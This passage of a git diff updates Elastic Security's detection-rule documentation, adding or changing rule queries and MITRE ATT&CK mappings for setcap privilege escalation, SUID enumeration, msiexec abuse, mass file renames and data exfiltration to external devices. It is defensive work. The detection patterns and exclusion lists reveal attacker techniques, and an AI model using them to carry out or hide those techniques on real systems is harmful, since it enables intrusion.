https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc b/docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc new file mode 100644 index 0000000000..a13ecab3ab --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc @@ -0,0 +1,68 @@ +[[setcap-setuid-setgid-capability-set]] +=== Setcap setuid/setgid Capability Set + +This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "setcap" and process.args : "cap_set?id+ep" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc index b3f6170325..fca9a8882d 100644 --- a/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc @@ -33,7 +33,7 @@ This rule monitors the creation of shared object files by previously unknown pro * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -49,7 +49,8 @@ This rule monitors the creation of shared object files by previously unknown pro ---------------------------------- host.os.type:linux and event.action:(creation or file_create_event or file_rename_event or rename) and file.path:(/dev/shm/* or /usr/lib/*) and file.extension:so and -process.name: ( * and not ("5" or "dockerd" or "dpkg" or "rpm" or "snapd" or "exe" or "yum" or "vmis-launcher")) +process.name: ( * and not ("5" or "dockerd" or "dpkg" or "rpm" or "snapd" or "exe" or "yum" or "vmis-launcher" + or "pacman" or "apt-get" or "dnf")) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc index e68c0ae140..d874ef70f5 100644 --- a/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/solarwinds-process-disabling-services-via-registry.asciidoc @@ -32,10 +32,11 @@ Identifies a SolarWinds binary modifying the start type of a service to be disab * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Initial Access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -87,6 +88,10 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ * Tactic: ** Name: Initial Access ** ID: TA0001 diff --git a/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc b/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc index ba52b0b6ba..ade88a91ce 100644 --- a/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/spike-in-aws-error-messages.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected a significant spike in the rate of a particular * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc new file mode 100644 index 0000000000..bee5e7f09f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc @@ -0,0 +1,58 @@ +[[spike-in-bytes-sent-to-an-external-device-via-airdrop]] +=== Spike in Bytes Sent to an External Device via Airdrop + +A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Other Network Medium +** ID: T1011 +** Reference URL: https://attack.mitre.org/techniques/T1011/ diff --git a/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc new file mode 100644 index 0000000000..92691dd128 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc @@ -0,0 +1,58 @@ +[[spike-in-bytes-sent-to-an-external-device]] +=== Spike in Bytes Sent to an External Device + +A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ diff --git a/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc index 543ce72006..9903c3d908 100644 --- a/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/ssh-authorized-keys-file-modification.asciidoc @@ -3,7 +3,7 @@ The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -32,7 +32,7 @@ The Secure Shell (SSH) authorized_keys file specifies which users are allowed to * Tactic: Persistence * Data Source: Elastic Defend -*Version*: 104 +*Version*: 204 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc index 67dca6e88e..b1ebe743fc 100644 --- a/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/startup-folder-persistence-via-unsigned-process.asciidoc @@ -27,10 +27,11 @@ Identifies files written or modified in the startup folder by unsigned processes * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -138,3 +139,15 @@ sequence by host.id, process.entity_id with maxspan=5s ** Name: Registry Run Keys / Startup Folder ** ID: T1547.001 ** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc index d482c5ba44..37bb522102 100644 --- a/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sudo-command-enumeration-detected.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the usage of the sudo -l command, which is used to list t * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc index f19fe95811..e6fa9a0153 100644 --- a/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sudoers-file-modification.asciidoc @@ -3,7 +3,7 @@ A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -31,7 +31,7 @@ A sudoers file specifies the commands that users or groups can run and from whic * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 103 +*Version*: 203 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc index ff1fecdf45..4364a6d0e3 100644 --- a/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suid-sguid-enumeration-detected.asciidoc @@ -30,7 +30,7 @@ This rule monitors for the usage of the "find" command in conjunction with SUID * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -47,8 +47,10 @@ This rule monitors for the usage of the "find" command in conjunction with SUID process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "find" and process.args : "-perm" and process.args : ( "/6000", "-6000", "/4000", "-4000", "/2000", "-2000", "/u=s", "-u=s", "/g=s", "-g=s", "/u=s,g=s", "/g=s,u=s" -) and -not user.Ext.real.id == "0" and not group.Ext.real.id == "0" +) and not ( + user.Ext.real.id == "0" or group.Ext.real.id == "0" or process.args_count >= 12 or + (process.args : "/usr/bin/pkexec" and process.args : "-xdev" and process.args_count == 7) +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc index c5ee143c96..1c94d5f5a7 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-activity-reported-by-okta-user.asciidoc @@ -32,7 +32,7 @@ Detects when a user reports suspicious activity for their Okta account. These ev * Data Source: Okta * Tactic: Initial Access -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc index e6fbb324ef..03f74023bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-cmd-execution-via-wmi.asciidoc @@ -33,7 +33,7 @@ Identifies suspicious command execution (cmd) via Windows Management Instrumenta * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -71,3 +71,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Management Instrumentation ** ID: T1047 ** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc index 5af23728a0..0cf85f0b0d 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-communication-app-child-process.asciidoc @@ -27,10 +27,11 @@ Identifies suspicious child processes of communications apps, which can indicate * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -240,7 +241,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ * Technique: ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc index e9c1dfa948..e50c071977 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-content-extracted-or-decompressed-via-funzip.asciidoc @@ -33,7 +33,7 @@ Identifies when suspicious content is extracted from a file and subsequently dec * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc index c2aa3179c4..0a02219b79 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc @@ -32,7 +32,7 @@ Identifies when the openssl command-line utility is used to encrypt multiple fil * Tactic: Impact * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc index 81b463ff3e..7f737d5d89 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc @@ -38,11 +38,12 @@ Identifies the loading of a non Microsoft signed DLL that is missing on a defaul * Use Case: Threat Detection * Tactic: Persistence * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -153,3 +154,15 @@ any where host.os.type == "windows" and ** Name: DLL Search Order Hijacking ** ID: T1574.001 ** Reference URL: https://attack.mitre.org/techniques/T1574/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc index 96c88ddd22..6d63d9f3bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-endpoint-security-parent-process.asciidoc @@ -33,7 +33,7 @@ A suspicious Endpoint Security parent process was detected. This may indicate a * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -76,3 +76,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc index 4933e48e60..8eb53fbcdc 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-from-a-mounted-device.asciidoc @@ -32,9 +32,10 @@ Identifies when a script interpreter or signed binary is launched via a non-stan * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -98,3 +99,7 @@ process where host.os.type == "windows" and event.type == "start" and process.ex ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc new file mode 100644 index 0000000000..d8fadc0aa8 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc @@ -0,0 +1,94 @@ +[[suspicious-execution-via-msiexec]] +=== Suspicious Execution via MSIEXEC + +Identifies suspicious execution of the built-in Windows Installer, msiexec.exe, to install a package from usual paths or parent process. Adversaries may abuse msiexec.exe to launch malicious local MSI files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Msiexec/ +* https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + process.name : "msiexec.exe" and user.id : ("S-1-5-21*", "S-1-12-*") and process.parent.executable != null and + ( + (process.args : "/i" and process.args : ("/q", "/quiet") and process.args_count == 4 and + process.args : ("?:\\Users\\*", "?:\\ProgramData\\*") and + not process.parent.executable : ("?:\\Program Files (x86)\\*.exe", + "?:\\Program Files\\*.exe", + "?:\\Windows\\explorer.exe", + "?:\\Users\\*\\Desktop\\*", + "?:\\Users\\*\\Downloads\\*", + "?:\\programdata\\*")) or + + (process.args_count == 1 and not process.parent.executable : ("?:\\Windows\\explorer.exe", "?:\\Windows\\SysWOW64\\explorer.exe")) or + + (process.args : "/i" and process.args : ("/q", "/quiet") and process.args_count == 4 and + (process.parent.args : "Schedule" or process.parent.name : "wmiprvse.exe" or + process.parent.executable : "?:\\Users\\*\\AppData\\*" or + (process.parent.name : ("powershell.exe", "cmd.exe") and length(process.parent.command_line) >= 200))) or + + (process.args : "/i" and process.args : ("/q", "/quiet") and process.args_count == 4 and + process.working_directory : "?:\\" and process.parent.name : ("cmd.exe", "powershell.exe")) + ) and + + /* noisy pattern */ + not (process.parent.executable : "?:\\Users\\*\\AppData\\Local\\Temp\\*" and process.parent.args_count >= 2 and + process.args : "?:\\Users\\*\\AppData\\Local\\Temp\\*\\*.msi") and + + not process.args : ("?:\\Program Files (x86)\\*", "?:\\Program Files\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc index 4c7787314d..146fd0ff75 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-scheduled-task.asciidoc @@ -29,9 +29,10 @@ Identifies execution of a suspicious program via scheduled tasks by looking at p * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -108,3 +109,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc index 8e729a39a8..444a1e5f92 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-explorer-child-process.asciidoc @@ -30,10 +30,12 @@ Identifies a suspicious Windows explorer child process. Explorer.exe can be abus * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -89,3 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Spearphishing Link ** ID: T1566.002 ** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc index 1ad03e568d..30d21bf559 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-file-changes-activity-detected.asciidoc @@ -29,7 +29,7 @@ This rule identifies a sequence of 100 file extension rename events within a set * Tactic: Impact * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -43,18 +43,12 @@ This rule identifies a sequence of 100 file extension rename events within a set [source, js] ---------------------------------- -sequence by host.id, process.entity_id with maxspan=1s +sequence by process.entity_id, host.id with maxspan=1s [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" - and ((process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "ash", "openssl")) or - (process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*"))) and + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and file.path : ( "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", - "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*") and not (( - process.name : ( - "dpkg", "yum", "dnf", "rpm", "dockerd", "go", "java", "pip*", "python*", "node", "containerd", "php", "p4d", - "conda", "chrome", "imap", "cmake", "firefox", "semanage", "semodule", "ansible-galaxy", "fc-cache", "jammy", "git", - "systemsettings", "vmis-launcher")) or file.path : "/etc/selinux/*" or (file.extension in ("qmlc", "txt") - ))] with runs=25 + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc index 01be81ba4b..05958029bb 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-file-creation-in-etc-for-persistence.asciidoc @@ -36,7 +36,7 @@ Detects the manual creation of files in specific etc directories, via user root, * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: diff --git 